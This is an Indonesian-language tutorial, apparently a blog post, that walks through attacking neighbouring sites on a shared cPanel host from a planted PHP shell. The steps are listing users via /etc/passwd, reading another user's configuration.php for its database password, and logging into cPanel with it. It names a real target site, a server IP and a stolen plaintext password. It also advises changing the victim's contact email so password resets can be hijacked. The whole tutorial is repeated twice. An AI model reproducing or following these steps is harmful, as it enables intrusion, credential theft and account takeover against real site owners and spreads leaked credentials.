Langkah pertama kita buka phpshell ato target injek kita ... saya ambil contoh utk site ini
http://www.abm.no/
langkah pertama :
cat /etc/passwd <--- guna nya buat tau jumlah user yg ada disana ....
contoh :
lagerhus:x:32050:32051::/home/lagerhus:/usr/local/cpanel/bin/jailshell ltngrupp:x:32051:32052::/home/ ltngrupp:/usr/local/cpanel/bin/jailshell melodin:x:32054:32055::/home/melodin:/usr/local/cpanel/bin/ jailshell monalisa:x:32055:32056::/home/monalisa:/usr/local/cpanel/bin/jailshell sandvika:x:32056:32057::/ home/sandvika:/usr/local/cpanel/bin/jailshell storvilt:x:32057:32058::/home/storvilt:/usr/local/cpanel/ bin/jailshell supercup:x:32058:32059::/home/supercup:/usr/local/cpanel/bin/jailshell
ok ...
langkah kedua .... pilih salah satu user ...
contoh : /home/monalisa <-- aku pilih ini ... dan masuk ke folder public_html ...
/home/monalisa/public_html
langkah ke tiga coba kalian ls -al dan perhatikan saut2 nama file itu
contoh: ls -al dari /home/monalisa/public_html
344337 drwxr-x--- 27 monalisa nobody 4096 Aug 29 09:31 . 5718289 drwx--x--x 11 monalisa monalisa 4096 Aug 29 09:53 .. 344348 -rw-r--r-- 1 monalisa monalisa 690 May 11 02:14 .htaccess 344088 -rwxr-xr-x 1 monalisa monalisa 56216 Feb 26 2006 CHANGELOG.php 344354 -rwxr-xr-x 1 monalisa monalisa 3429 Feb 26 2006 COPYRIGHT.php 344351 -rwxrwxrwx 1 monalisa monalisa 1122 Jul 20 18:18 INSTALL.php 344342 -rwxrwxrwx 1 monalisa monalisa 17977 Sep 17 2005 LICENSE.php 10240263 drwxrwxrwx 9 monalisa monalisa 4096 Dec 15 2005 administrator 4194486 drwxrwxrwx 16 monalisa monalisa 4096 Feb 22 2006 bancorotto 8176127 drwxr-xr-x 9 monalisa monalisa 4096 Mar 24 14:00 bilder 9846992 drwxrwxrwx 2 monalisa monalisa 4096 Dec 21 2005 bilder_old 4194627 drwxrwxrwx 16 monalisa monalisa 4096 Feb 22 2006 byrakrat 32993 drwxrwxrwx 2 monalisa monalisa 4096 May 30 13:04 cache 4194623 drwxrwxrwx 16 monalisa monalisa 4096 Feb 22 2006 cafebeirut 5095694 drwxrwxrwx 2 monalisa monalisa 4096 Oct 1 2005 cgi-bin 180461 drwxrwxrwx 25 monalisa monalisa 4096 May 31 12:00 components 344140 -rwxr-xr-x 1 monalisa monalisa 2852 Jul 25 12:06 configuration.php 344141 -rwxr-xr-x 1 root root 2855 Jul 17 17:52 configuration.php~ 4194484 drwxrwxrwx 16 monalisa monalisa 4096 Aug 22 15:18 davinci
dari sini kita bisa liat bahwa user monalisa menggunakan mambo ...
langkah ke empat yaitu baca file yg bernama configuration.php ato config.php ato db.php
contoh: dalam kasus ini file yg ada adalah configuration.php jadi kita cat configuration.php hasilnya :
$mosConfig_live_site = ´http://www.monalisahuset.no´; $mosConfig_locale = ´no_NO´; $mosConfig_mailer = ´mail´; $mosConfig_mailfrom = ´post@monalisahuset.no´; $mosConfig_ml_support = ´0´; $mosConfig_multipage_toc = ´1´; $mosConfig_offline = ´0´; $mosConfig_offline_message = ´This site is down for maintenance.<br /> Please check back again soon.´; $mosConfig_offset = ´-2´; $mosConfig_offset_user = ´0´; $mosConfig_pagetitles = ´1´; $mosConfig_password = ´jqUf#(l´;
ok dari sini kita bisa mendapat pass dari user tersebut pass na adalah $mosConfig_password = ´jqUf#(l´;
langkah ke lima mengetahui bagaimana cara utk login ke dalam cpanel ato ssh ...
setelah kita mendapat kan passwordnya kita coba utk login ke cpanel nya caranya ketik /dns <site target> di Mirc
contoh:
[15:02] * Dns resolving www.abm.no - [15:02] * Dns resolved www.abm.no to 62.70.54.76
dari situ kita mendapat kan ip server 62.70.54.76 utk login cpanel kita bisa menggunakan http://<ip server>:2082 dalam hal ini http://62.70.54.76:2082
setelah itu kita masukan username dan pass .... utk username kita dapat dari cat /etc/passwd dan dalam kasus ini user yg kita pake adalah monalisa jadi utk login kita masukan username:monalisa password:jqUf#(l
dan anda tlah masuk kedalam cpanel nya ...
Note: 1. Tidak smua user mempunyai cpanel ato ssh ... ini dapat kita lihat dari cat /etc/passwd tandanya : /usr/local/cpanel/bin/jailshell <--- berarti user ini memiliki cpanel dan shell tapi jika : /bin/false <-- tandanya cpanel nya dia tidak punya ato shellna.
2. Beberapa server sudah mulai pintar menyembunyikan pass mreka ... salah satu trik utk medapat kan pass mreka coba kalian baca index.php ato admin.php disana akan di cantumkan letak dimana user name dan password nya di sembunyikan.
3. satu saran dari saya setelah kmu masuk ke cpanel jgn merubah password mereka tapi rubah aja contact information masukan email kalian disana dan klo pass udah dirubah tinggal reset password dan pass na akan kekirim ke email kalian
http://www.abm.no/
langkah pertama :
cat /etc/passwd <--- guna nya buat tau jumlah user yg ada disana ....
contoh :
lagerhus:x:32050:32051::/home/lagerhus:/usr/local/cpanel/bin/jailshell ltngrupp:x:32051:32052::/home/
ok ...
langkah kedua .... pilih salah satu user ...
contoh : /home/monalisa <-- aku pilih ini ... dan masuk ke folder public_html ...
/home/monalisa/public_html
langkah ke tiga coba kalian ls -al dan perhatikan saut2 nama file itu
contoh: ls -al dari /home/monalisa/public_html
344337 drwxr-x--- 27 monalisa nobody 4096 Aug 29 09:31 . 5718289 drwx--x--x 11 monalisa monalisa 4096 Aug 29 09:53 .. 344348 -rw-r--r-- 1 monalisa monalisa 690 May 11 02:14 .htaccess 344088 -rwxr-xr-x 1 monalisa monalisa 56216 Feb 26 2006 CHANGELOG.php 344354 -rwxr-xr-x 1 monalisa monalisa 3429 Feb 26 2006 COPYRIGHT.php 344351 -rwxrwxrwx 1 monalisa monalisa 1122 Jul 20 18:18 INSTALL.php 344342 -rwxrwxrwx 1 monalisa monalisa 17977 Sep 17 2005 LICENSE.php 10240263 drwxrwxrwx 9 monalisa monalisa 4096 Dec 15 2005 administrator 4194486 drwxrwxrwx 16 monalisa monalisa 4096 Feb 22 2006 bancorotto 8176127 drwxr-xr-x 9 monalisa monalisa 4096 Mar 24 14:00 bilder 9846992 drwxrwxrwx 2 monalisa monalisa 4096 Dec 21 2005 bilder_old 4194627 drwxrwxrwx 16 monalisa monalisa 4096 Feb 22 2006 byrakrat 32993 drwxrwxrwx 2 monalisa monalisa 4096 May 30 13:04 cache 4194623 drwxrwxrwx 16 monalisa monalisa 4096 Feb 22 2006 cafebeirut 5095694 drwxrwxrwx 2 monalisa monalisa 4096 Oct 1 2005 cgi-bin 180461 drwxrwxrwx 25 monalisa monalisa 4096 May 31 12:00 components 344140 -rwxr-xr-x 1 monalisa monalisa 2852 Jul 25 12:06 configuration.php 344141 -rwxr-xr-x 1 root root 2855 Jul 17 17:52 configuration.php~ 4194484 drwxrwxrwx 16 monalisa monalisa 4096 Aug 22 15:18 davinci
dari sini kita bisa liat bahwa user monalisa menggunakan mambo ...
langkah ke empat yaitu baca file yg bernama configuration.php ato config.php ato db.php
contoh: dalam kasus ini file yg ada adalah configuration.php jadi kita cat configuration.php hasilnya :
$mosConfig_live_site = ´http://www.monalisahuset.no´; $mosConfig_locale = ´no_NO´; $mosConfig_mailer = ´mail´; $mosConfig_mailfrom = ´post@monalisahuset.no´; $mosConfig_ml_support = ´0´; $mosConfig_multipage_toc = ´1´; $mosConfig_offline = ´0´; $mosConfig_offline_message = ´This site is down for maintenance.<br /> Please check back again soon.´; $mosConfig_offset = ´-2´; $mosConfig_offset_user = ´0´; $mosConfig_pagetitles = ´1´; $mosConfig_password = ´jqUf#(l´;
ok dari sini kita bisa mendapat pass dari user tersebut pass na adalah $mosConfig_password = ´jqUf#(l´;
langkah ke lima mengetahui bagaimana cara utk login ke dalam cpanel ato ssh ...
setelah kita mendapat kan passwordnya kita coba utk login ke cpanel nya caranya ketik /dns <site target> di Mirc
contoh:
[15:02] * Dns resolving www.abm.no - [15:02] * Dns resolved www.abm.no to 62.70.54.76
dari situ kita mendapat kan ip server 62.70.54.76 utk login cpanel kita bisa menggunakan http://<ip server>:2082 dalam hal ini http://62.70.54.76:2082
setelah itu kita masukan username dan pass .... utk username kita dapat dari cat /etc/passwd dan dalam kasus ini user yg kita pake adalah monalisa jadi utk login kita masukan username:monalisa password:jqUf#(l
dan anda tlah masuk kedalam cpanel nya ...
Note: 1. Tidak smua user mempunyai cpanel ato ssh ... ini dapat kita lihat dari cat /etc/passwd tandanya : /usr/local/cpanel/bin/jailshell <--- berarti user ini memiliki cpanel dan shell tapi jika : /bin/false <-- tandanya cpanel nya dia tidak punya ato shellna.
2. Beberapa server sudah mulai pintar menyembunyikan pass mreka ... salah satu trik utk medapat kan pass mreka coba kalian baca index.php ato admin.php disana akan di cantumkan letak dimana user name dan password nya di sembunyikan.
3. satu saran dari saya setelah kmu masuk ke cpanel jgn merubah password mereka tapi rubah aja contact information masukan email kalian disana dan klo pass udah dirubah tinggal reset password dan pass na akan kekirim ke email kalian
gan tolong ya :) klo maling tutorial saya sertakan pembuatnya ya ;)
BalasHapus